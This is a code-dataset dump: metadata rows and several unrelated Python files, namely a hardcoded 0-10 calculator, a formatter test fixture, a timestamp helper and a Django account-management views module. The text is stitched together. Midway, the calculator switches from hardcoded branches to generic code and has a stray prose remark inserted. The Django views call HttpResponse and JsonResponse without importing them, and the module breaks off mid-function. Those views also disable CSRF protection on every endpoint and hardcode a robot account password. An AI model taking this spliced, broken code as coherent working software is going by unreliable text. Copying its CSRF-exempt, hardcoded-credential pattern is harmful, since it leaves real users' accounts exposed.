##################################################### | 46.697842 | 108 | 0.50285 | 1,157 | 6,491 | 2.489196 | 0.064823 | 0.289931 | 0.187153 | 0.294097 | 0.801389 | 0.768403 | 0.729514 | 0.711111 | 0.697569 | 0.663194 | 0 | 0.034864 | 0.262055 | 6,491 | 139 | 109 | 46.697842 | 0.566388 | 0.038669 | 0 | 0.381818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009091 | false | 0 | 0.009091 | 0 | 0.018182 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6b9fcd6f41b72008f61cd8963c62b85ec62ed1ab | 37,195 | py | Python | my_first_calculator_0_to_10.py | PrinceShaji/NoobCalculator | 7f2c002b563edae21b7e9c7c422dc43e1eb70bf8 | [
"MIT"
] | null | null | null | my_first_calculator_0_to_10.py | PrinceShaji/NoobCalculator | 7f2c002b563edae21b7e9c7c422dc43e1eb70bf8 | [
"MIT"
] | null | null | null | my_first_calculator_0_to_10.py | PrinceShaji/NoobCalculator | 7f2c002b563edae21b7e9c7c422dc43e1eb70bf8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Welcome to my first calculator.
# Inspired by https://github.com/AceLewis.
# This calculator can calculate numbers from 0 to 10.
try:
number1 = int(input('Enter first number: '))
operation = input('Enter the operation [+, -, *, /]: ')
number2 = int(input('Enter second number: '))
except ValueError:
print('Only input digits. Try again.')
exit()
allowed_operations = ('+', '-', '*', '/')
print('\n')
if operation not in allowed_operations:
print('Invalid operation!')
exit()
if number1 == 0 and operation == '+' and number2 == 0:
print("0+0 = 0")
if number1 == 0 and operation == '+' and number2 == 1:
print("0+1 = 1")
if number1 == 0 and operation == '+' and number2 == 2:
print("0+2 = 2")
if number1 == 0 and operation == '+' and number2 == 3:
print("0+3 = 3")
if number1 == 0 and operation == '+' and number2 == 4:
print("0+4 = 4")
if number1 == 0 and operation == '+' and number2 == 5:
print("0+5 = 5")
if number1 == 0 and operation == '+' and number2 == 6:
print("0+6 = 6")
if number1 == 0 and operation == '+' and number2 == 7:
print("0+7 = 7")
if number1 == 0 and operation == '+' and number2 == 8:
print("0+8 = 8")
if number1 == 0 and operation == '+' and number2 == 9:
print("0+9 = 9")
if number1 == 0 and operation == '+' and number2 == 10:
print("0+10 = 10")
if number1 == 1 and operation == '+' and number2 == 0:
print("1+0 = 1")
if number1 == 1 and operation == '+' and number2 == 1:
print("1+1 = 2")
if number1 == 1 and operation == '+' and number2 == 2:
print("1+2 = 3")
if number1 == 1 and operation == '+' and number2 == 3:
print("1+3 = 4")
if number1 == 1 and operation == '+' and number2 == 4:
print("1+4 = 5")
if number1 == 1 and operation == '+' and number2 == 5:
print("1+5 = 6")
if number1 == 1 and operation == '+' and number2 == 6:
print("1+6 = 7")
if number1 == 1 and operation == '+' and number2 == 7:
print("1+7 = 8")
if number1 == 1 and operation == '+' and number2 == 8:
print("1+8 = 9")
if number1 == 1 and operation == '+' and number2 == 9:
print("1+9 = 10")
if number1 == 1 and operation == '+' and number2 == 10:
print("1+10 = 11")
if number1 == 2 and operation == '+' and number2 == 0:
print("2+0 = 2")
if number1 == 2 and operation == '+' and number2 == 1:
print("2+1 = 3")
if number1 == 2 and operation == '+' and number2 == 2:
print("2+2 = 4")
if number1 == 2 and operation == '+' and number2 == 3:
print("2+3 = 5")
if number1 == 2 and operation == '+' and number2 == 4:
print("2+4 = 6")
if number1 == 2 and operation == '+' and number2 == 5:
print("2+5 = 7")
if number1 == 2 and operation == '+' and number2 == 6:
print("2+6 = 8")
if number1 == 2 and operation == '+' and number2 == 7:
print("2+7 = 9")
if number1 == 2 and operation == '+' and number2 == 8:
print("2+8 = 10")
if number1 == 2 and operation == '+' and number2 == 9:
print("2+9 = 11")
if number1 == 2 and operation == '+' and number2 == 10:
print("2+10 = 12")
if number1 == 3 and operation == '+' and number2 == 0:
print("3+0 = 3")
if number1 == 3 and operation == '+' and number2 == 1:
print("3+1 = 4")
if number1 == 3 and operation == '+' and number2 == 2:
print("3+2 = 5")
if number1 == 3 and operation == '+' and number2 == 3:
print("3+3 = 6")
if number1 == 3 and operation == '+' and number2 == 4:
print("3+4 = 7")
if number1 == 3 and operation == '+' and number2 == 5:
print("3+5 = 8")
if number1 == 3 and operation == '+' and number2 == 6:
print("3+6 = 9")
if number1 == 3 and operation == '+' and number2 == 7:
print("3+7 = 10")
if number1 == 3 and operation == '+' and number2 == 8:
print("3+8 = 11")
if number1 == 3 and operation == '+' and number2 == 9:
print("3+9 = 12")
if number1 == 3 and operation == '+' and number2 == 10:
print("3+10 = 13")
if number1 == 4 and operation == '+' and number2 == 0:
print("4+0 = 4")
if number1 == 4 and operation == '+' and number2 == 1:
print("4+1 = 5")
if number1 == 4 and operation == '+' and number2 == 2:
print("4+2 = 6")
if number1 == 4 and operation == '+' and number2 == 3:
print("4+3 = 7")
if number1 == 4 and operation == '+' and number2 == 4:
print("4+4 = 8")
if number1 == 4 and operation == '+' and number2 == 5:
print("4+5 = 9")
if number1 == 4 and operation == '+' and number2 == 6:
print("4+6 = 10")
if number1 == 4 and operation == '+' and number2 == 7:
print("4+7 = 11")
if number1 == 4 and operation == '+' and number2 == 8:
print("4+8 = 12")
if number1 == 4 and operation == '+' and number2 == 9:
print("4+9 = 13")
if number1 == 4 and operation == '+' and number2 == 10:
print("4+10 = 14")
if number1 == 5 and operation == '+' and number2 == 0:
print("5+0 = 5")
if number1 == 5 and operation == '+' and number2 == 1:
print("5+1 = 6")
if number1 == 5 and operation == '+' and number2 == 2:
print("5+2 = 7")
if number1 == 5 and operation == '+' and number2 == 3:
print("5+3 = 8")
if number1 == 5 and operation == '+' and number2 == 4:
print("5+4 = 9")
if number1 == 5 and operation == '+' and number2 == 5:
print("5+5 = 10")
if number1 == 5 and operation == '+' and number2 == 6:
print("5+6 = 11")
if number1 == 5 and operation == '+' and number2 == 7:
print("5+7 = 12")
if number1 == 5 and operation == '+' and number2 == 8:
print("5+8 = 13")
if number1 == 5 and operation == '+' and number2 == 9:
print("5+9 = 14")
if number1 == 5 and operation == '+' and number2 == 10:
print("5+10 = 15")
if number1 == 6 and operation == '+' and number2 == 0:
print("6+0 = 6")
if number1 == 6 and operation == '+' and number2 == 1:
print("6+1 = 7")
if number1 == 6 and operation == '+' and number2 == 2:
print("6+2 = 8")
if number1 == 6 and operation == '+' and number2 == 3:
print("6+3 = 9")
if number1 == 6 and operation == '+' and number2 == 4:
print("6+4 = 10")
if number1 == 6 and operation == '+' and number2 == 5:
print("6+5 = 11")
if number1 == 6 and operation == '+' and number2 == 6:
print("6+6 = 12")
if number1 == 6 and operation == '+' and number2 == 7:
print("6+7 = 13")
if number1 == 6 and operation == '+' and number2 == 8:
print("6+8 = 14")
if number1 == 6 and operation == '+' and number2 == 9:
print("6+9 = 15")
if number1 == 6 and operation == '+' and number2 == 10:
print("6+10 = 16")
if number1 == 7 and operation == '+' and number2 == 0:
print("7+0 = 7")
if number1 == 7 and operation == '+' and number2 == 1:
print("7+1 = 8")
if number1 == 7 and operation == '+' and number2 == 2:
print("7+2 = 9")
if number1 == 7 and operation == '+' and number2 == 3:
print("7+3 = 10")
if number1 == 7 and operation == '+' and number2 == 4:
print("7+4 = 11")
if number1 == 7 and operation == '+' and number2 == 5:
print("7+5 = 12")
if number1 == 7 and operation == '+' and number2 == 6:
print("7+6 = 13")
if number1 == 7 and operation == '+' and number2 == 7:
print("7+7 = 14")
if number1 == 7 and operation == '+' and number2 == 8:
print("7+8 = 15")
if number1 == 7 and operation == '+' and number2 == 9:
print("7+9 = 16")
if number1 == 7 and operation == '+' and number2 == 10:
print("7+10 = 17")
if number1 == 8 and operation == '+' and number2 == 0:
print("8+0 = 8")
if number1 == 8 and operation == '+' and number2 == 1:
print("8+1 = 9")
if number1 == 8 and operation == '+' and number2 == 2:
print("8+2 = 10")
if number1 == 8 and operation == '+' and number2 == 3:
print("8+3 = 11")
if number1 == 8 and operation == '+' and number2 == 4:
print("8+4 = 12")
if number1 == 8 and operation == '+' and number2 == 5:
print("8+5 = 13")
if number1 == 8 and operation == '+' and number2 == 6:
print("8+6 = 14")
if number1 == 8 and operation == '+' and number2 == 7:
print("8+7 = 15")
if number1 == 8 and operation == '+' and number2 == 8:
print("8+8 = 16")
if number1 == 8 and operation == '+' and number2 == 9:
print("8+9 = 17")
if number1 == 8 and operation == '+' and number2 == 10:
print("8+10 = 18")
if number1 == 9 and operation == '+' and number2 == 0:
print("9+0 = 9")
if number1 == 9 and operation == '+' and number2 == 1:
print("9+1 = 10")
if number1 == 9 and operation == '+' and number2 == 2:
print("9+2 = 11")
if number1 == 9 and operation == '+' and number2 == 3:
print("9+3 = 12")
if number1 == 9 and operation == '+' and number2 == 4:
print("9+4 = 13")
if number1 == 9 and operation == '+' and number2 == 5:
print("9+5 = 14")
if number1 == 9 and operation == '+' and number2 == 6:
print("9+6 = 15")
if number1 == 9 and operation == '+' and number2 == 7:
print("9+7 = 16")
if number1 == 9 and operation == '+' and number2 == 8:
print("9+8 = 17")
if number1 == 9 and operation == '+' and number2 == 9:
print("9+9 = 18")
if number1 == 9 and operation == '+' and number2 == 10:
print("9+10 = 19")
if number1 == 10 and operation == '+' and number2 == 0:
print("10+0 = 10")
if number1 == 10 and operation == '+' and number2 == 1:
print("10+1 = 11")
if number1 == 10 and operation == '+' and number2 == 2:
print("10+2 = 12")
if number1 == 10 and operation == '+' and number2 == 3:
print("10+3 = 13")
if number1 == 10 and operation == '+' and number2 == 4:
print("10+4 = 14")
if number1 == 10 and operation == '+' and number2 == 5:
print("10+5 = 15")
if number1 == 10 and operation == '+' and number2 == 6:
print("10+6 = 16")
if number1 == 10 and operation == '+' and number2 == 7:
print("10+7 = 17")
if number1 == 10 and operation == '+' and number2 == 8:
print("10+8 = 18")
if number1 == 10 and operation == '+' and number2 == 9:
print("10+9 = 19")
if number1 == 10 and operation == '+' and number2 == 10:
print("10+10 = 20")
if number1 == 0 and operation == '-' and number2 == 0:
print("0-0 = 0")
if number1 == 0 and operation == '-' and number2 == 1:
print("0-1 = -1")
if number1 == 0 and operation == '-' and number2 == 2:
print("0-2 = -2")
if number1 == 0 and operation == '-' and number2 == 3:
print("0-3 = -3")
if number1 == 0 and operation == '-' and number2 == 4:
print("0-4 = -4")
if number1 == 0 and operation == '-' and number2 == 5:
print("0-5 = -5")
if number1 == 0 and operation == '-' and number2 == 6:
print("0-6 = -6")
if number1 == 0 and operation == '-' and number2 == 7:
print("0-7 = -7")
if number1 == 0 and operation == '-' and number2 == 8:
print("0-8 = -8")
if number1 == 0 and operation == '-' and number2 == 9:
print("0-9 = -9")
if number1 == 0 and operation == '-' and number2 == 10:
print("0-10 = -10")
if number1 == 1 and operation == '-' and number2 == 0:
print("1-0 = 1")
# Subtraction: every pair covered by this section (1-1 through 10-10, plus n-0 for n >= 2)
if operation == '-' and number1 in range(1, 11) and number2 in range(0, 11) and not (number1 == 1 and number2 == 0):
    print(f"{number1}-{number2} = {number1 - number2}")
# Multiplication: every pair with both operands in 0..10
if operation == '*' and number1 in range(0, 11) and number2 in range(0, 11):
    print(f"{number1}*{number2} = {number1 * number2}")
# Division: every pair with both operands in 0..10, guarding against division by zero
if operation == '/' and number1 in range(0, 11) and number2 in range(0, 11):
    if number2 == 0:
        print("Cannot divide by Zero.")
    else:
        print(f"{number1}/{number2} = {number1 / number2}")
print("\nCheckout the original code by AceLewis on GitHub.\nHave a good day!")
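The per-case branches above can be generalized with a dispatch table; a minimal sketch (the names `OPS` and `calculate` are illustrative, not from the original):

```python
import operator

# Map each operator symbol to the corresponding binary function.
OPS = {'+': operator.add, '-': operator.sub, '*': operator.mul}

def calculate(number1, operation, number2):
    """Return the same formatted result string the hardcoded prints produce."""
    if operation == '/':
        if number2 == 0:
            return "Cannot divide by Zero."
        return f"{number1}/{number2} = {number1 / number2}"
    return f"{number1}{operation}{number2} = {OPS[operation](number1, number2)}"

print(calculate(7, '*', 8))  # 7*8 = 56
```

Division is special-cased so the zero guard and the float formatting match the original output.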
# tests/test_binop/output.py (waadnakhleh/pythonformatter, MIT)
1 + 2
a - b
c * d
mat @ mat
di / di
1221203 % 2
2 ** 2
2 << 2
2 >> 2
15 | 0
15 & 1
1 ^ 0
16 // 2.5
ab = (
12431241241
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
)
a = 10
ab = (
12431241241
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
)
# pdfmb/utils.py (1081/pdfmb, MIT)
import time
def timestamp_file():
    """Return a colon-free timestamp ('%Y-%m-%d %H%M%S') safe for file names."""
    return time.strftime("%Y-%m-%d %H%M%S")


def timestamp_outline():
    """Return a human-readable timestamp ('%Y-%m-%d %H:%M') for outline entries."""
    return time.strftime("%Y-%m-%d %H:%M")
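A self-contained usage sketch for the two helpers (they are restated so the snippet runs on its own; the regex format checks are illustrative):

```python
import re
import time

def timestamp_file():
    # Colon-free, so the result is safe to embed in file names.
    return time.strftime("%Y-%m-%d %H%M%S")

def timestamp_outline():
    return time.strftime("%Y-%m-%d %H:%M")

# Verify the expected shapes, e.g. '2024-01-31 235959' and '2024-01-31 23:59'.
assert re.fullmatch(r"\d{4}-\d{2}-\d{2} \d{6}", timestamp_file())
assert re.fullmatch(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}", timestamp_outline())
```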
# backend/views.py (romic-kid/project-kfsystem, BSD-3-Clause)
from django.views.decorators.csrf import csrf_exempt
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from .models import Admin, CustomerService, ChattingLog, SerialNumber, EnterpriseDisplayInfo, RobotInfo, BigImageLog, SmallImageLog
from .serializers import AdminSerializer, CustomerServiceSerializer, CustomerServiceCreateSerializer, ChattingLogSerializer, SerialNumberSerializer, EnterpriseDisplayInfoSerializer, RobotInfoSerializer, BigImageLogSerializer, SmallImageLogSerializer
from datetime import datetime, timedelta
from .views_helper_functions import *
from .views_check_functions import *
from .robot import *
from .robot_basic import *
from django.utils import timezone
import os
import base64
@csrf_exempt
def admin_create(request):
if request.method == 'POST':
# Admin: email nickname password SerialNumber: serials
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_create_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['password'] = admin_generate_password(json_receive['email'], json_receive['password'])
json_receive['web_url'] = "192.168.55.33:8000/web/" + json_receive['nickname'] + '/'
json_receive['widget_url'] = "192.168.55.33:8000/widget/" + json_receive['nickname'] + '/'
json_receive['mobile_url'] = "192.168.55.33:8000/mobile/" + json_receive['nickname'] + '/'
json_receive['communication_key'] = admin_generate_communication_key(json_receive['email'])
json_receive['vid'] = admin_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = AdminSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
instance = Admin.objects.get(email=json_receive['email'])
CustomerService.objects.create(email=json_receive['nickname']+'@robot.com', enterprise=instance, nickname=json_receive['nickname']+'&Robot', password='robot_password', is_register=True, is_online=True, connection_num=0, vid='robot_vid')
sn_mark_used(json_receive['serials'])
return HttpResponse('OK', status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
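`admin_generate_password` is imported from `views_helper_functions` (not shown in this file). A plausible email-salted SHA-512 sketch, purely an assumption for illustration:

```python
import hashlib

def admin_generate_password(email, password):
    # Hypothetical implementation: salt the password with the email before
    # hashing. The real helper in views_helper_functions may differ.
    return hashlib.sha512((email + password).encode('utf-8')).hexdigest()

digest = admin_generate_password('a@b.com', 'secret')
assert len(digest) == 128  # a SHA-512 hex digest is always 128 characters
```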
@csrf_exempt
def admin_login(request):
if request.method == 'POST':
# Admin: email password
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_login_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
sha512_final_password = admin_generate_password(json_receive['email'], json_receive['password'])
if admin_is_valid_by_email_password(json_receive['email'], sha512_final_password) == True:
# cs_sessions_del(request)
request.session['a_email'] = json_receive['email']
return HttpResponse('OK', status=200)
else:
return HttpResponse("ERROR, wrong email or password.", status=200)
@csrf_exempt
def admin_reset_password(request):
if request.method == 'POST':
# Admin: password newpassword
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_reset_password_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['email'] = request.session['a_email']
sha512_old_final_password = admin_generate_password(json_receive['email'], json_receive['password'])
if admin_is_valid_by_email_password(json_receive['email'], sha512_old_final_password) == False:
return HttpResponse("ERROR, wrong email or password.", status=200)
sha512_new_final_password = admin_generate_password(json_receive['email'], json_receive['newpassword'])
instance = Admin.objects.get(email=json_receive['email'], password=sha512_old_final_password)
json_receive['password'] = sha512_new_final_password
serializer = AdminSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def admin_forget_password_email_request(request):
if request.method == 'POST':
# Admin: email
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_forget_password_email_request_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance = Admin.objects.get(email=json_receive['email'])
json_receive['vid'] = admin_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = AdminSerializer(instance, data=json_receive)
content = 'Dear ' + instance.nickname + ':\n' + 'You have submitted a password retrieval, Please click the following links to finish the operation.\n' + 'http://192.168.55.33:8000/en_password_retrieval/?email=' + json_receive['email'] + '&key=' + json_receive['vid']
if serializer.is_valid():
serializer.save()
admin_send_email_forget_password(json_receive['email'], content)
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def admin_forget_password_check_vid(request):
    if request.method == 'POST':
        # Admin: email vid
        json_receive = JSONParser().parse(request)
        is_correct, error_message = admin_forget_password_check_vid_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        json_receive['vid'] = admin_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        instance = Admin.objects.get(email=json_receive['email'])
        serializer = AdminSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse(json_receive['vid'], status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def admin_forget_password_save_data(request):
    if request.method == 'POST':
        # Admin: email newpassword vid
        json_receive = JSONParser().parse(request)
        is_correct, error_message = admin_forget_password_save_data_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance = Admin.objects.get(email=json_receive['email'])
        sha512_new_final_password = admin_generate_password(json_receive['email'], json_receive['newpassword'])
        json_receive['password'] = sha512_new_final_password
        json_receive['vid'] = admin_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        serializer = AdminSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def admin_show_communication_key(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_show_communication_key_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['a_email']
        communication_key = admin_get_communication_key(data_email)
        json_send = {'communication_key': communication_key}
        return JsonResponse(json_send, status=200)


@csrf_exempt
def admin_reset_communication_key(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_reset_communication_key_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        json_receive = dict()
        json_receive['email'] = request.session['a_email']
        instance = Admin.objects.get(email=json_receive['email'])
        json_receive['communication_key'] = admin_generate_communication_key(json_receive['email'])
        serializer = AdminSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def admin_show_cs_status(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_show_cs_status_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['a_email']
        instance_admin = Admin.objects.get(email=data_email)
        instance_customerservice = CustomerService.objects.filter(enterprise=instance_admin.id)
        json_send = list()
        for i in instance_customerservice:
            json_send.append({'email': i.email, 'is_register': i.is_register, 'is_online': i.is_online, 'connection_num': i.connection_num, 'nickname': i.nickname})
        return JsonResponse(json_send, safe=False, status=200)


@csrf_exempt
def admin_delete_cs(request):
    if request.method == 'POST':
        # CustomerService: email
        json_receive = JSONParser().parse(request)
        is_correct, error_message = admin_delete_cs_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance_cs = CustomerService.objects.get(email=json_receive['email'])
        instance_cs.delete()
        return HttpResponse('OK', status=200)


@csrf_exempt
def admin_show_user_status(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_show_user_status_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['a_email']
        instance = Admin.objects.get(email=data_email)
        json_send = {'email': instance.email, 'nickname': instance.nickname}
        return JsonResponse(json_send, status=200)


@csrf_exempt
def admin_show_url_status(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_show_url_status_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['a_email']
        instance = Admin.objects.get(email=data_email)
        json_send = {'web_url': instance.web_url, 'widget_url': instance.widget_url, 'mobile_url': instance.mobile_url}
        return JsonResponse(json_send, status=200)


@csrf_exempt
def admin_display_info_create(request):
    if request.method == 'POST':
        # EnterpriseInfoType: name comment
        json_receive = JSONParser().parse(request)
        is_correct, error_message = admin_display_info_create_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['a_email']
        instance_admin = Admin.objects.get(email=data_email)
        json_receive['enterprise'] = instance_admin.id
        serializer = EnterpriseDisplayInfoSerializer(data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def admin_display_info_delete(request):
    if request.method == 'POST':
        # EnterpriseInfoType: name
        json_receive = JSONParser().parse(request)
        is_correct, error_message = admin_display_info_delete_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['a_email']
        instance_admin = Admin.objects.get(email=data_email)
        instance_displayinfo = EnterpriseDisplayInfo.objects.filter(enterprise=instance_admin.id, name=json_receive['name'])
        instance_displayinfo.delete()
        return HttpResponse('OK', status=200)


@csrf_exempt
def admin_display_info_show(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_display_info_show_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        admin_email = request.session['a_email']
        instance_admin = Admin.objects.get(email=admin_email)
        instance_displayinfo = EnterpriseDisplayInfo.objects.filter(enterprise=instance_admin.id)
        json_send = list()
        for i in instance_displayinfo:
            json_send.append({'name': i.name, 'comment': i.comment})
        return JsonResponse(json_send, safe=False, status=200)


@csrf_exempt
def admin_logout(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = admin_logout_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        del request.session['a_email']
        return HttpResponse('OK', status=200)


@csrf_exempt
def customerservice_create(request):
    if request.method == 'POST':
        # CustomerService: email
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_create_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        cs_reset_create(json_receive['email'])
        admin_email = request.session['a_email']
        instance_admin = Admin.objects.get(email=admin_email)
        json_receive['nickname'] = json_receive['email']
        json_receive['enterprise'] = instance_admin.id
        json_receive['vid'] = cs_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        serializer = CustomerServiceCreateSerializer(data=json_receive)
        content = 'Dear customerservice' + ':\n' + 'Please click the following links to finish the operation.\n' + 'http://192.168.55.33:8000/se_folders/?email=' + json_receive['email'] + '&key=' + json_receive['vid']
        if serializer.is_valid():
            serializer.save()
            cs_send_email_create_account(json_receive['email'], content)
            return HttpResponse('OK', status=200)
        return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def customerservice_set_profile(request):
    if request.method == 'POST':
        # CustomerService: email password nickname vid
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_set_profile_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        json_receive['password'] = cs_generate_password(json_receive['email'], json_receive['password'])
        json_receive['vid'] = cs_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        json_receive['is_register'] = True
        instance = CustomerService.objects.get(email=json_receive['email'])
        serializer = CustomerServiceSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse('ERROR, invalid data in serializer.', status=200)


@csrf_exempt
def customerservice_set_profile_check_vid(request):
    if request.method == 'POST':
        # CustomerService: email vid
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_set_profile_check_vid_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        json_receive['vid'] = cs_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        instance = CustomerService.objects.get(email=json_receive['email'])
        serializer = CustomerServiceSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse(json_receive['vid'], status=200)
        return HttpResponse('ERROR, invalid data in serializer.', status=200)


@csrf_exempt
def customerservice_login(request):
    if request.method == 'POST':
        # CustomerService: email password
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_login_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        sha512_final_password = cs_generate_password(json_receive['email'], json_receive['password'])
        if cs_is_valid_by_email_password(json_receive['email'], sha512_final_password) == True:
            # admin_sessions_del(request)
            request.session['c_email'] = json_receive['email']
            instance_cs = CustomerService.objects.get(email=json_receive['email'])
            instance_cs.is_online = True
            instance_cs.save()
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, wrong email or password.", status=200)


@csrf_exempt
def customerservice_reset_password(request):
    if request.method == 'POST':
        # CustomerService: password newpassword
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_reset_password_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        json_receive['email'] = request.session['c_email']
        sha512_old_final_password = cs_generate_password(json_receive['email'], json_receive['password'])
        if cs_is_valid_by_email_password(json_receive['email'], sha512_old_final_password) == False:
            return HttpResponse("ERROR, wrong email or password.", status=200)
        sha512_new_final_password = cs_generate_password(json_receive['email'], json_receive['newpassword'])
        instance = CustomerService.objects.get(email=json_receive['email'], password=sha512_old_final_password)
        json_receive['password'] = sha512_new_final_password
        serializer = CustomerServiceSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def customerservice_forget_password_email_request(request):
    if request.method == 'POST':
        # CustomerService: email
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_forget_password_email_request_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance = CustomerService.objects.get(email=json_receive['email'])
        json_receive['vid'] = cs_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        serializer = CustomerServiceSerializer(instance, data=json_receive)
        content = 'Dear ' + instance.nickname + ':\n' + 'You have submitted a password retrieval, Please click the following links to finish the operation.\n' + 'http://192.168.55.33:8000/se_password_retrieval/?email=' + json_receive['email'] + '&key=' + json_receive['vid']
        if serializer.is_valid():
            serializer.save()
            cs_send_email_forget_password(json_receive['email'], content)
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def customerservice_forget_password_check_vid(request):
    if request.method == 'POST':
        # CustomerService: email vid
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_forget_password_check_vid_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        json_receive['vid'] = cs_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        instance = CustomerService.objects.get(email=json_receive['email'])
        serializer = CustomerServiceSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse(json_receive['vid'], status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def customerservice_forget_password_save_data(request):
    if request.method == 'POST':
        # CustomerService: email newpassword vid
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_forget_password_save_data_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance = CustomerService.objects.get(email=json_receive['email'])
        sha512_new_final_password = cs_generate_password(json_receive['email'], json_receive['newpassword'])
        json_receive['password'] = sha512_new_final_password
        json_receive['vid'] = cs_generate_vid(json_receive['email'])
        json_receive['vid_createtime'] = timezone.now()
        serializer = CustomerServiceSerializer(instance, data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def customerservice_show_user_status(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = customerservice_show_user_status_check(request)
